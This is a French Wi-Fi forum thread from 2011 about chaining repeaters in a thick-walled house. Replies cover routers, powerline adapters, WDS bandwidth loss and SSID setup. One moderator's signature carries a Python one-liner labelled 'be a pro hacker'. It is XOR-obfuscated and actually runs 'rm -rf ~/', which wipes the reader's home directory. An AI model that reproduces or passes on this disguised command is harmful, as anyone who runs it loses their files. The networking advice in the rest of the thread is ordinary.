Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-09-2011 16:39:31

j74
N00b
Inscription : 23-09-2011
Messages : 3

Répéteurs WIFI en série ?

Hello,

Dans une grande maison aux murs en pierres très épais, le WIFI de ma Freebox (v4) passe très mal.
Je me demandais s'il était possible d'utiliser 2 ou 3 répéteurs de signal, en série. Comme suit:

  Freebox --> Répéteur 1 --> Répéteur 2 --> Répéteur 3 --> PC portable


Ou bien n'est-ce possible qu'en "étoile" (Freebox au centre), comme ceci:

PC portable <-- Répéteur 1 <-- Freebox --> Répéteur 2 --> PC portable

Je précise que je ne souhaite pas utiliser du CPL car l'installation éléctrique est un peu "space"....

Par avance, merci !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-09-2011 17:27:46

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Répéteurs WIFI en série ?

Oui, c'est possible.
Il suffit d'utiliser un routeur (linksys reste une référence) et de le connecter à la freebox.
Une ou deux manip's et en s'authentifiant auprès du routeur, on pourra avoir accès à internet gràce à la freebox.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 24-09-2011 17:40:36

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Répéteurs WIFI en série ?

le CPL (courant porteur), ca ne te tente pas ???? utiliser (meme phase de courant biensur)

Hors Ligne

#4 24-09-2011 22:26:14

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Répéteurs WIFI en série ?

@ yasmine:

j74 a écrit :

Je précise que je ne souhaite pas utiliser du CPL car l'installation éléctrique est un peu "space"....

Hors Ligne

#5 25-09-2011 08:01:17

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Répéteurs WIFI en série ?

OH !!!

Pourtant je lis tjrs et je ne bois que de l eau !!!
je dois revoir mon toubib

Hors Ligne

#6 27-09-2011 14:38:33

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Répéteurs WIFI en série ?

Techniquement c'est possible, mais en pratique ça risque d'être foireux : que ce soit en WDS ou en répéteur universel, ta bande passante est réduite (parfois de 50%) pour que le dispositif puisse jouer son rôle (moitié du temps en écoute, moitié du temps en émission). Si tu commences à les mettre en cascade, tu risques de te retrouver avec un débit pitoyable en bout de ligne hmm

Tu ne peux pas utiliser une combinaison WiFi + CPL ? Pour relier certains de tes répéteurs entre eux (là où l'installation électrique est "propre") ?

Hors Ligne

#7 02-10-2011 09:37:36

j74
N00b
Inscription : 23-09-2011
Messages : 3

Re : Répéteurs WIFI en série ?

Bonjour à tous,

Merci pour vos réponses et désolé pour le retard, j'ai eu de gros soucis de connexion...
Je vais évaluer la meilleure solution, en essayant effectivement d'opter pour un mixe CPL / Wifi, en espèrant que ça passe...
Le mieux est-il de prendre des boitiers tout en un (Wifi integré au CPL) ?
Par avance, merci !

Hors Ligne

#8 02-10-2011 09:54:00

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Répéteurs WIFI en série ?

Je prendrais plutôt des boitiers "classiques" sur lesquels tu brancherais un AP WiFi : ça te donne plus de flexibilité sur le réglage de la partie sans-fil, ainsi qu'une meilleure puissance d'émission. En effet, les boîtiers avec WiFi intégré sont prévus pour couvrir 1 pièce, peut-être 2 mais pas beaucoup plus... En branchant un AP au choix, tu peux couvrir d'avantage smile

Hors Ligne

#9 02-10-2011 10:00:07

j74
N00b
Inscription : 23-09-2011
Messages : 3

Re : Répéteurs WIFI en série ?

Merci antares !
Mais dans ce cas on a plusieurs SSID différents non ?
Enfin, ça importe peu je suppose...

Hors Ligne

#10 02-10-2011 10:17:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Répéteurs WIFI en série ?

Ca dépend comment tu configures le truc en fait. De toute façon, si tu as un problème de couverture, les 2 réseaux n'émettront pas sur la même zone, donc tu peux reprendre le même SSID tongue

De façon plus "propre", tu peux configurer les AP pour qu'ils utilisent le WDS, et donc avoir le même SSID tout en assurant un roaming propre d'une cellule à l'autre. Ca, ça dépend un peu des implémentations des différents constructeurs, parfois ça marche impec' et parfois ça plante lamentablement. Essaie, ça vaut peut-être la peine smile

Sinon, effectivement, la solution à plusieurs SSID est celle qui marchera à tous les coups, mais c'est vrai que ça fait moins "propre"...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 284 17-11-2016 12:02:17 par koala
25 1090 07-11-2016 20:09:33 par M1ck3y
0 265 22-10-2016 19:03:48 par Antho3674
6 4740 05-10-2016 10:26:24 par X-Ecutioner
9 899 28-09-2016 11:33:08 par damsss

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]